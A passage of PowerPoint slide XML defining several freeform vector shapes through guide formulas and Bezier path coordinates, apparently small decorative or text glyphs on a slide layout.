                <a:gd name="T28" fmla="*/ 15 w 35"/>
                <a:gd name="T29" fmla="*/ 34 h 34"/>
                <a:gd name="T30" fmla="*/ 10 w 35"/>
                <a:gd name="T31" fmla="*/ 34 h 34"/>
                <a:gd name="T32" fmla="*/ 9 w 35"/>
                <a:gd name="T33" fmla="*/ 31 h 34"/>
                <a:gd name="T34" fmla="*/ 14 w 35"/>
                <a:gd name="T35" fmla="*/ 32 h 34"/>
                <a:gd name="T36" fmla="*/ 17 w 35"/>
                <a:gd name="T37" fmla="*/ 29 h 34"/>
                <a:gd name="T38" fmla="*/ 17 w 35"/>
                <a:gd name="T39" fmla="*/ 23 h 34"/>
                <a:gd name="T40" fmla="*/ 0 w 35"/>
                <a:gd name="T41" fmla="*/ 23 h 34"/>
                <a:gd name="T42" fmla="*/ 0 w 35"/>
                <a:gd name="T43" fmla="*/ 21 h 34"/>
                <a:gd name="T44" fmla="*/ 1 w 35"/>
                <a:gd name="T45" fmla="*/ 5 h 34"/>
                <a:gd name="T46" fmla="*/ 18 w 35"/>
                <a:gd name="T47" fmla="*/ 5 h 34"/>
                <a:gd name="T48" fmla="*/ 14 w 35"/>
                <a:gd name="T49" fmla="*/ 1 h 34"/>
                <a:gd name="T50" fmla="*/ 17 w 35"/>
                <a:gd name="T51" fmla="*/ 0 h 34"/>
                <a:gd name="T52" fmla="*/ 20 w 35"/>
                <a:gd name="T53" fmla="*/ 4 h 34"/>
                <a:gd name="T54" fmla="*/ 19 w 35"/>
                <a:gd name="T55" fmla="*/ 5 h 34"/>
                <a:gd name="T56" fmla="*/ 34 w 35"/>
                <a:gd name="T57" fmla="*/ 5 h 34"/>
                <a:gd name="T58" fmla="*/ 34 w 35"/>
                <a:gd name="T59" fmla="*/ 12 h 34"/>
                <a:gd name="T60" fmla="*/ 31 w 35"/>
                <a:gd name="T61" fmla="*/ 12 h 34"/>
                <a:gd name="T62" fmla="*/ 31 w 35"/>
                <a:gd name="T63" fmla="*/ 8 h 34"/>
                <a:gd name="T64" fmla="*/ 4 w 35"/>
                <a:gd name="T65" fmla="*/ 8 h 34"/>
                <a:gd name="T66" fmla="*/ 4 w 35"/>
                <a:gd name="T67" fmla="*/ 12 h 34"/>
                <a:gd name="T68" fmla="*/ 1 w 35"/>
                <a:gd name="T69" fmla="*/ 12 h 34"/>
                <a:gd name="T70" fmla="*/ 1 w 35"/>
                <a:gd name="T71" fmla="*/ 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" h="34">
                  <a:moveTo>
                    <a:pt x="0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="21"/>
                    <a:pt x="17" y="21"/>
                    <a:pt x="17" y="21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3"/>
                    <a:pt x="18" y="34"/>
                    <a:pt x="15" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="10" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="33"/>
                    <a:pt x="9" y="32"/>
                    <a:pt x="9" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="31"/>
                    <a:pt x="13" y="32"/>
                    <a:pt x="14" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="32"/>
                    <a:pt x="17" y="31"/>
                    <a:pt x="17" y="29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0" y="21"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1" y="5"/>
                  </a:move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6" y="3"/>
                    <a:pt x="14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1"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="20" y="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4" name="Freeform 20"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7831560" y="-267218"/>
              <a:ext cx="58415" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 35"/>
                <a:gd name="T1" fmla="*/ 17 h 34"/>
                <a:gd name="T2" fmla="*/ 9 w 35"/>
                <a:gd name="T3" fmla="*/ 0 h 34"/>
                <a:gd name="T4" fmla="*/ 12 w 35"/>
                <a:gd name="T5" fmla="*/ 1 h 34"/>
                <a:gd name="T6" fmla="*/ 9 w 35"/>
                <a:gd name="T7" fmla="*/ 9 h 34"/>
                <a:gd name="T8" fmla="*/ 9 w 35"/>
                <a:gd name="T9" fmla="*/ 34 h 34"/>
                <a:gd name="T10" fmla="*/ 6 w 35"/>
                <a:gd name="T11" fmla="*/ 34 h 34"/>
                <a:gd name="T12" fmla="*/ 6 w 35"/>
                <a:gd name="T13" fmla="*/ 15 h 34"/>
                <a:gd name="T14" fmla="*/ 1 w 35"/>
                <a:gd name="T15" fmla="*/ 21 h 34"/>
                <a:gd name="T16" fmla="*/ 0 w 35"/>
                <a:gd name="T17" fmla="*/ 17 h 34"/>
                <a:gd name="T18" fmla="*/ 10 w 35"/>
                <a:gd name="T19" fmla="*/ 22 h 34"/>
                <a:gd name="T20" fmla="*/ 19 w 35"/>
                <a:gd name="T21" fmla="*/ 17 h 34"/>
                <a:gd name="T22" fmla="*/ 19 w 35"/>
                <a:gd name="T23" fmla="*/ 1 h 34"/>
                <a:gd name="T24" fmla="*/ 22 w 35"/>
                <a:gd name="T25" fmla="*/ 1 h 34"/>
                <a:gd name="T26" fmla="*/ 22 w 35"/>
                <a:gd name="T27" fmla="*/ 15 h 34"/>
                <a:gd name="T28" fmla="*/ 31 w 35"/>
                <a:gd name="T29" fmla="*/ 5 h 34"/>
                <a:gd name="T30" fmla="*/ 34 w 35"/>
                <a:gd name="T31" fmla="*/ 6 h 34"/>
                <a:gd name="T32" fmla="*/ 22 w 35"/>
                <a:gd name="T33" fmla="*/ 18 h 34"/>
                <a:gd name="T34" fmla="*/ 22 w 35"/>
                <a:gd name="T35" fmla="*/ 28 h 34"/>
                <a:gd name="T36" fmla="*/ 24 w 35"/>
                <a:gd name="T37" fmla="*/ 31 h 34"/>
                <a:gd name="T38" fmla="*/ 29 w 35"/>
                <a:gd name="T39" fmla="*/ 31 h 34"/>
                <a:gd name="T40" fmla="*/ 31 w 35"/>
                <a:gd name="T41" fmla="*/ 28 h 34"/>
                <a:gd name="T42" fmla="*/ 32 w 35"/>
                <a:gd name="T43" fmla="*/ 23 h 34"/>
                <a:gd name="T44" fmla="*/ 35 w 35"/>
                <a:gd name="T45" fmla="*/ 24 h 34"/>
                <a:gd name="T46" fmla="*/ 34 w 35"/>
                <a:gd name="T47" fmla="*/ 29 h 34"/>
                <a:gd name="T48" fmla="*/ 29 w 35"/>
                <a:gd name="T49" fmla="*/ 33 h 34"/>
                <a:gd name="T50" fmla="*/ 23 w 35"/>
                <a:gd name="T51" fmla="*/ 33 h 34"/>
                <a:gd name="T52" fmla="*/ 19 w 35"/>
                <a:gd name="T53" fmla="*/ 29 h 34"/>
                <a:gd name="T54" fmla="*/ 19 w 35"/>
                <a:gd name="T55" fmla="*/ 20 h 34"/>
                <a:gd name="T56" fmla="*/ 12 w 35"/>
                <a:gd name="T57" fmla="*/ 24 h 34"/>
                <a:gd name="T58" fmla="*/ 10 w 35"/>
                <a:gd name="T5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34">
                  <a:moveTo>
                    <a:pt x="0" y="17"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="12"/>
                    <a:pt x="7" y="6"/>
                    <a:pt x="9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4"/>
                    <a:pt x="10" y="7"/>
                    <a:pt x="9" y="9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4" y="17"/>
                    <a:pt x="3" y="19"/>
                    <a:pt x="1" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20"/>
                    <a:pt x="1" y="19"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="20"/>
                    <a:pt x="16" y="19"/>
                    <a:pt x="19" y="17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5" y="12"/>
                    <a:pt x="28" y="8"/>
                    <a:pt x="31" y="5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0" y="11"/>
                    <a:pt x="26" y="15"/>
                    <a:pt x="22" y="1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2" y="30"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="24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1"/>
                    <a:pt x="31" y="30"/>
                    <a:pt x="31" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="27"/>
                    <a:pt x="32" y="25"/>
                    <a:pt x="32" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="23"/>
                    <a:pt x="34" y="24"/>
                    <a:pt x="35" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="26"/>
                    <a:pt x="35" y="28"/>
                    <a:pt x="34" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="32"/>
                    <a:pt x="32" y="33"/>
                    <a:pt x="29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0" y="33"/>
                    <a:pt x="19" y="32"/>
                    <a:pt x="19" y="2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6" y="22"/>
                    <a:pt x="14" y="23"/>
                    <a:pt x="12" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="24"/>
                    <a:pt x="11" y="23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5" name="Freeform 21"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7948389" y="-267218"/>
              <a:ext cx="56078" cy="59193"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 34"/>
                <a:gd name="T1" fmla="*/ 32 h 35"/>
                <a:gd name="T2" fmla="*/ 15 w 34"/>
                <a:gd name="T3" fmla="*/ 27 h 35"/>
                <a:gd name="T4" fmla="*/ 6 w 34"/>
                <a:gd name="T5" fmla="*/ 23 h 35"/>
                <a:gd name="T6" fmla="*/ 9 w 34"/>
                <a:gd name="T7" fmla="*/ 18 h 35"/>
                <a:gd name="T8" fmla="*/ 0 w 34"/>
                <a:gd name="T9" fmla="*/ 18 h 35"/>
                <a:gd name="T10" fmla="*/ 0 w 34"/>
                <a:gd name="T11" fmla="*/ 15 h 35"/>
                <a:gd name="T12" fmla="*/ 10 w 34"/>
                <a:gd name="T13" fmla="*/ 15 h 35"/>
                <a:gd name="T14" fmla="*/ 14 w 34"/>
                <a:gd name="T15" fmla="*/ 9 h 35"/>
                <a:gd name="T16" fmla="*/ 17 w 34"/>
                <a:gd name="T17" fmla="*/ 10 h 35"/>
                <a:gd name="T18" fmla="*/ 14 w 34"/>
                <a:gd name="T19" fmla="*/ 15 h 35"/>
                <a:gd name="T20" fmla="*/ 34 w 34"/>
                <a:gd name="T21" fmla="*/ 15 h 35"/>
                <a:gd name="T22" fmla="*/ 34 w 34"/>
                <a:gd name="T23" fmla="*/ 18 h 35"/>
                <a:gd name="T24" fmla="*/ 27 w 34"/>
                <a:gd name="T25" fmla="*/ 18 h 35"/>
                <a:gd name="T26" fmla="*/ 21 w 34"/>
                <a:gd name="T27" fmla="*/ 27 h 35"/>
                <a:gd name="T28" fmla="*/ 32 w 34"/>
                <a:gd name="T29" fmla="*/ 32 h 35"/>
                <a:gd name="T30" fmla="*/ 30 w 34"/>
                <a:gd name="T31" fmla="*/ 35 h 35"/>
                <a:gd name="T32" fmla="*/ 18 w 34"/>
                <a:gd name="T33" fmla="*/ 29 h 35"/>
                <a:gd name="T34" fmla="*/ 2 w 34"/>
                <a:gd name="T35" fmla="*/ 35 h 35"/>
                <a:gd name="T36" fmla="*/ 1 w 34"/>
                <a:gd name="T37" fmla="*/ 32 h 35"/>
                <a:gd name="T38" fmla="*/ 1 w 34"/>
                <a:gd name="T39" fmla="*/ 5 h 35"/>
                <a:gd name="T40" fmla="*/ 17 w 34"/>
                <a:gd name="T41" fmla="*/ 5 h 35"/>
                <a:gd name="T42" fmla="*/ 14 w 34"/>
                <a:gd name="T43" fmla="*/ 1 h 35"/>
                <a:gd name="T44" fmla="*/ 16 w 34"/>
                <a:gd name="T45" fmla="*/ 0 h 35"/>
                <a:gd name="T46" fmla="*/ 20 w 34"/>
                <a:gd name="T47" fmla="*/ 4 h 35"/>
                <a:gd name="T48" fmla="*/ 18 w 34"/>
                <a:gd name="T49" fmla="*/ 5 h 35"/>
                <a:gd name="T50" fmla="*/ 33 w 34"/>
                <a:gd name="T51" fmla="*/ 5 h 35"/>
                <a:gd name="T52" fmla="*/ 33 w 34"/>
                <a:gd name="T53" fmla="*/ 12 h 35"/>
                <a:gd name="T54" fmla="*/ 30 w 34"/>
                <a:gd name="T55" fmla="*/ 12 h 35"/>
                <a:gd name="T56" fmla="*/ 30 w 34"/>
                <a:gd name="T57" fmla="*/ 8 h 35"/>
                <a:gd name="T58" fmla="*/ 4 w 34"/>
                <a:gd name="T59" fmla="*/ 8 h 35"/>
                <a:gd name="T60" fmla="*/ 4 w 34"/>
                <a:gd name="T61" fmla="*/ 12 h 35"/>
                <a:gd name="T62" fmla="*/ 1 w 34"/>
                <a:gd name="T63" fmla="*/ 12 h 35"/>
                <a:gd name="T64" fmla="*/ 1 w 34"/>
                <a:gd name="T65" fmla="*/ 5 h 35"/>
                <a:gd name="T66" fmla="*/ 10 w 34"/>
                <a:gd name="T67" fmla="*/ 22 h 35"/>
                <a:gd name="T68" fmla="*/ 18 w 34"/>
                <a:gd name="T69" fmla="*/ 25 h 35"/>
                <a:gd name="T70" fmla="*/ 24 w 34"/>
                <a:gd name="T71" fmla="*/ 18 h 35"/>
                <a:gd name="T72" fmla="*/ 12 w 34"/>
                <a:gd name="T73" fmla="*/ 18 h 35"/>
                <a:gd name="T74" fmla="*/ 10 w 34"/>
                <a:gd name="T75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4" h="35">
                  <a:moveTo>
                    <a:pt x="1" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="31"/>
                    <a:pt x="12" y="29"/>
                    <a:pt x="15" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="26"/>
                    <a:pt x="9" y="24"/>
                    <a:pt x="6" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="21"/>
                    <a:pt x="8" y="19"/>
                    <a:pt x="9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3"/>
                    <a:pt x="13" y="11"/>
                    <a:pt x="14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2"/>
                    <a:pt x="15" y="13"/>
                    <a:pt x="1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21"/>
                    <a:pt x="24" y="24"/>
                    <a:pt x="21" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="28"/>
                    <a:pt x="28" y="30"/>
                    <a:pt x="32" y="32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27" y="33"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="18" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="32"/>
                    <a:pt x="9" y="33"/>
                    <a:pt x="2" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="34"/>
                    <a:pt x="1" y="33"/>
                    <a:pt x="1" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1" y="5"/>
                  </a:move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5" y="3"/>
                    <a:pt x="14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1"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="20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5"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="23"/>
                    <a:pt x="15" y="24"/>
                    <a:pt x="18" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="23"/>
                    <a:pt x="23" y="21"/>
                    <a:pt x="24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9"/>
                    <a:pt x="10" y="20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6" name="Freeform 22"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8062881" y="-265661"/>
              <a:ext cx="58415" cy="54520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 20 w 35"/>
                <a:gd name="T1" fmla="*/ 0 h 32"/>
                <a:gd name="T2" fmla="*/ 19 w 35"/>
                <a:gd name="T3" fmla="*/ 0 h 32"/>
                <a:gd name="T4" fmla="*/ 35 w 35"/>
                <a:gd name="T5" fmla="*/ 12 h 32"/>
                <a:gd name="T6" fmla="*/ 33 w 35"/>
                <a:gd name="T7" fmla="*/ 15 h 32"/>
                <a:gd name="T8" fmla="*/ 17 w 35"/>
                <a:gd name="T9" fmla="*/ 3 h 32"/>
                <a:gd name="T10" fmla="*/ 2 w 35"/>
                <a:gd name="T11" fmla="*/ 15 h 32"/>
                <a:gd name="T12" fmla="*/ 0 w 35"/>
                <a:gd name="T13" fmla="*/ 13 h 32"/>
                <a:gd name="T14" fmla="*/ 16 w 35"/>
                <a:gd name="T15" fmla="*/ 0 h 32"/>
                <a:gd name="T16" fmla="*/ 20 w 35"/>
                <a:gd name="T17" fmla="*/ 0 h 32"/>
                <a:gd name="T18" fmla="*/ 1 w 35"/>
                <a:gd name="T19" fmla="*/ 30 h 32"/>
                <a:gd name="T20" fmla="*/ 16 w 35"/>
                <a:gd name="T21" fmla="*/ 30 h 32"/>
                <a:gd name="T22" fmla="*/ 16 w 35"/>
                <a:gd name="T23" fmla="*/ 23 h 32"/>
                <a:gd name="T24" fmla="*/ 5 w 35"/>
                <a:gd name="T25" fmla="*/ 23 h 32"/>
                <a:gd name="T26" fmla="*/ 5 w 35"/>
                <a:gd name="T27" fmla="*/ 21 h 32"/>
                <a:gd name="T28" fmla="*/ 16 w 35"/>
                <a:gd name="T29" fmla="*/ 21 h 32"/>
                <a:gd name="T30" fmla="*/ 16 w 35"/>
                <a:gd name="T31" fmla="*/ 15 h 32"/>
                <a:gd name="T32" fmla="*/ 6 w 35"/>
                <a:gd name="T33" fmla="*/ 15 h 32"/>
                <a:gd name="T34" fmla="*/ 6 w 35"/>
                <a:gd name="T35" fmla="*/ 13 h 32"/>
                <a:gd name="T36" fmla="*/ 29 w 35"/>
                <a:gd name="T37" fmla="*/ 13 h 32"/>
                <a:gd name="T38" fmla="*/ 29 w 35"/>
                <a:gd name="T39" fmla="*/ 15 h 32"/>
                <a:gd name="T40" fmla="*/ 19 w 35"/>
                <a:gd name="T41" fmla="*/ 15 h 32"/>
                <a:gd name="T42" fmla="*/ 19 w 35"/>
                <a:gd name="T43" fmla="*/ 21 h 32"/>
                <a:gd name="T44" fmla="*/ 30 w 35"/>
                <a:gd name="T45" fmla="*/ 21 h 32"/>
                <a:gd name="T46" fmla="*/ 30 w 35"/>
                <a:gd name="T47" fmla="*/ 23 h 32"/>
                <a:gd name="T48" fmla="*/ 19 w 35"/>
                <a:gd name="T49" fmla="*/ 23 h 32"/>
                <a:gd name="T50" fmla="*/ 19 w 35"/>
                <a:gd name="T51" fmla="*/ 30 h 32"/>
                <a:gd name="T52" fmla="*/ 33 w 35"/>
                <a:gd name="T53" fmla="*/ 30 h 32"/>
                <a:gd name="T54" fmla="*/ 33 w 35"/>
                <a:gd name="T55" fmla="*/ 32 h 32"/>
                <a:gd name="T56" fmla="*/ 1 w 35"/>
                <a:gd name="T57" fmla="*/ 32 h 32"/>
                <a:gd name="T58" fmla="*/ 1 w 35"/>
                <a:gd name="T59" fmla="*/ 3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5" h="32">
                  <a:moveTo>
                    <a:pt x="20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23" y="6"/>
                    <a:pt x="28" y="9"/>
                    <a:pt x="35" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="13"/>
                    <a:pt x="34" y="14"/>
                    <a:pt x="33" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="12"/>
                    <a:pt x="22" y="8"/>
                    <a:pt x="17" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="7"/>
                    <a:pt x="9" y="11"/>
                    <a:pt x="2" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="15"/>
                    <a:pt x="0" y="14"/>
                    <a:pt x="0" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="9"/>
                    <a:pt x="13" y="5"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="30"/>
                    <a:pt x="16" y="30"/>
                    <a:pt x="16" y="30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" y="32"/>
                    <a:pt x="1" y="32"/>
                    <a:pt x="1" y="3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7" name="Freeform 23"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8181267" y="-267218"/>
              <a:ext cx="52962" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 32"/>
                <a:gd name="T1" fmla="*/ 6 h 34"/>
                <a:gd name="T2" fmla="*/ 3 w 32"/>
                <a:gd name="T3" fmla="*/ 6 h 34"/>
                <a:gd name="T4" fmla="*/ 5 w 32"/>
                <a:gd name="T5" fmla="*/ 0 h 34"/>
                <a:gd name="T6" fmla="*/ 8 w 32"/>
                <a:gd name="T7" fmla="*/ 1 h 34"/>
                <a:gd name="T8" fmla="*/ 6 w 32"/>
                <a:gd name="T9" fmla="*/ 6 h 34"/>
                <a:gd name="T10" fmla="*/ 13 w 32"/>
                <a:gd name="T11" fmla="*/ 6 h 34"/>
                <a:gd name="T12" fmla="*/ 13 w 32"/>
                <a:gd name="T13" fmla="*/ 34 h 34"/>
                <a:gd name="T14" fmla="*/ 10 w 32"/>
                <a:gd name="T15" fmla="*/ 34 h 34"/>
                <a:gd name="T16" fmla="*/ 10 w 32"/>
                <a:gd name="T17" fmla="*/ 31 h 34"/>
                <a:gd name="T18" fmla="*/ 2 w 32"/>
                <a:gd name="T19" fmla="*/ 31 h 34"/>
                <a:gd name="T20" fmla="*/ 2 w 32"/>
                <a:gd name="T21" fmla="*/ 34 h 34"/>
                <a:gd name="T22" fmla="*/ 0 w 32"/>
                <a:gd name="T23" fmla="*/ 34 h 34"/>
                <a:gd name="T24" fmla="*/ 0 w 32"/>
                <a:gd name="T25" fmla="*/ 6 h 34"/>
                <a:gd name="T26" fmla="*/ 10 w 32"/>
                <a:gd name="T27" fmla="*/ 9 h 34"/>
                <a:gd name="T28" fmla="*/ 2 w 32"/>
                <a:gd name="T29" fmla="*/ 9 h 34"/>
                <a:gd name="T30" fmla="*/ 2 w 32"/>
                <a:gd name="T31" fmla="*/ 17 h 34"/>
                <a:gd name="T32" fmla="*/ 10 w 32"/>
                <a:gd name="T33" fmla="*/ 17 h 34"/>
                <a:gd name="T34" fmla="*/ 10 w 32"/>
                <a:gd name="T35" fmla="*/ 9 h 34"/>
                <a:gd name="T36" fmla="*/ 2 w 32"/>
                <a:gd name="T37" fmla="*/ 28 h 34"/>
                <a:gd name="T38" fmla="*/ 10 w 32"/>
                <a:gd name="T39" fmla="*/ 28 h 34"/>
                <a:gd name="T40" fmla="*/ 10 w 32"/>
                <a:gd name="T41" fmla="*/ 20 h 34"/>
                <a:gd name="T42" fmla="*/ 2 w 32"/>
                <a:gd name="T43" fmla="*/ 20 h 34"/>
                <a:gd name="T44" fmla="*/ 2 w 32"/>
                <a:gd name="T45" fmla="*/ 28 h 34"/>
                <a:gd name="T46" fmla="*/ 14 w 32"/>
                <a:gd name="T47" fmla="*/ 13 h 34"/>
                <a:gd name="T48" fmla="*/ 19 w 32"/>
                <a:gd name="T49" fmla="*/ 0 h 34"/>
                <a:gd name="T50" fmla="*/ 22 w 32"/>
                <a:gd name="T51" fmla="*/ 1 h 34"/>
                <a:gd name="T52" fmla="*/ 20 w 32"/>
                <a:gd name="T53" fmla="*/ 6 h 34"/>
                <a:gd name="T54" fmla="*/ 32 w 32"/>
                <a:gd name="T55" fmla="*/ 6 h 34"/>
                <a:gd name="T56" fmla="*/ 31 w 32"/>
                <a:gd name="T57" fmla="*/ 29 h 34"/>
                <a:gd name="T58" fmla="*/ 25 w 32"/>
                <a:gd name="T59" fmla="*/ 34 h 34"/>
                <a:gd name="T60" fmla="*/ 19 w 32"/>
                <a:gd name="T61" fmla="*/ 34 h 34"/>
                <a:gd name="T62" fmla="*/ 18 w 32"/>
                <a:gd name="T63" fmla="*/ 31 h 34"/>
                <a:gd name="T64" fmla="*/ 18 w 32"/>
                <a:gd name="T65" fmla="*/ 31 h 34"/>
                <a:gd name="T66" fmla="*/ 25 w 32"/>
                <a:gd name="T67" fmla="*/ 31 h 34"/>
                <a:gd name="T68" fmla="*/ 28 w 32"/>
                <a:gd name="T69" fmla="*/ 28 h 34"/>
                <a:gd name="T70" fmla="*/ 29 w 32"/>
                <a:gd name="T71" fmla="*/ 8 h 34"/>
                <a:gd name="T72" fmla="*/ 19 w 32"/>
                <a:gd name="T73" fmla="*/ 8 h 34"/>
                <a:gd name="T74" fmla="*/ 16 w 32"/>
                <a:gd name="T75" fmla="*/ 14 h 34"/>
                <a:gd name="T76" fmla="*/ 14 w 32"/>
                <a:gd name="T77" fmla="*/ 13 h 34"/>
                <a:gd name="T78" fmla="*/ 17 w 32"/>
                <a:gd name="T79" fmla="*/ 15 h 34"/>
                <a:gd name="T80" fmla="*/ 19 w 32"/>
                <a:gd name="T81" fmla="*/ 14 h 34"/>
                <a:gd name="T82" fmla="*/ 25 w 32"/>
                <a:gd name="T83" fmla="*/ 22 h 34"/>
                <a:gd name="T84" fmla="*/ 23 w 32"/>
                <a:gd name="T85" fmla="*/ 24 h 34"/>
                <a:gd name="T86" fmla="*/ 17 w 32"/>
                <a:gd name="T87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" h="34">
                  <a:moveTo>
                    <a:pt x="0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4" y="4"/>
                    <a:pt x="5" y="2"/>
                    <a:pt x="5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3"/>
                    <a:pt x="7" y="4"/>
                    <a:pt x="6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0" y="34"/>
                    <a:pt x="0" y="34"/>
                    <a:pt x="0" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="6"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10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0" y="17"/>
                    <a:pt x="10" y="17"/>
                    <a:pt x="10" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10" y="9"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2" y="28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2" y="20"/>
                    <a:pt x="2" y="20"/>
                    <a:pt x="2" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="14" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="10"/>
                    <a:pt x="18" y="5"/>
                    <a:pt x="19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3"/>
                    <a:pt x="21" y="4"/>
                    <a:pt x="20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18"/>
                    <a:pt x="31" y="25"/>
                    <a:pt x="31" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="32"/>
                    <a:pt x="29" y="34"/>
                    <a:pt x="25" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="34"/>
                    <a:pt x="21" y="34"/>
                    <a:pt x="19" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="33"/>
                    <a:pt x="18" y="32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21" y="31"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="25" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="31"/>
                    <a:pt x="28" y="30"/>
                    <a:pt x="28" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="24"/>
                    <a:pt x="29" y="18"/>
                    <a:pt x="2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11"/>
                    <a:pt x="17" y="13"/>
                    <a:pt x="16" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="14"/>
                    <a:pt x="15" y="14"/>
                    <a:pt x="14" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="15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22" y="17"/>
                    <a:pt x="24" y="20"/>
                    <a:pt x="25" y="22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1" y="21"/>
                    <a:pt x="19" y="18"/>
                    <a:pt x="1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8" name="Freeform 24"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8292644" y="-265661"/>
              <a:ext cx="58415" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 10 w 35"/>
                <a:gd name="T1" fmla="*/ 0 h 34"/>
                <a:gd name="T2" fmla="*/ 10 w 35"/>
                <a:gd name="T3" fmla="*/ 1 h 34"/>
                <a:gd name="T4" fmla="*/ 16 w 35"/>
                <a:gd name="T5" fmla="*/ 9 h 34"/>
                <a:gd name="T6" fmla="*/ 14 w 35"/>
                <a:gd name="T7" fmla="*/ 11 h 34"/>
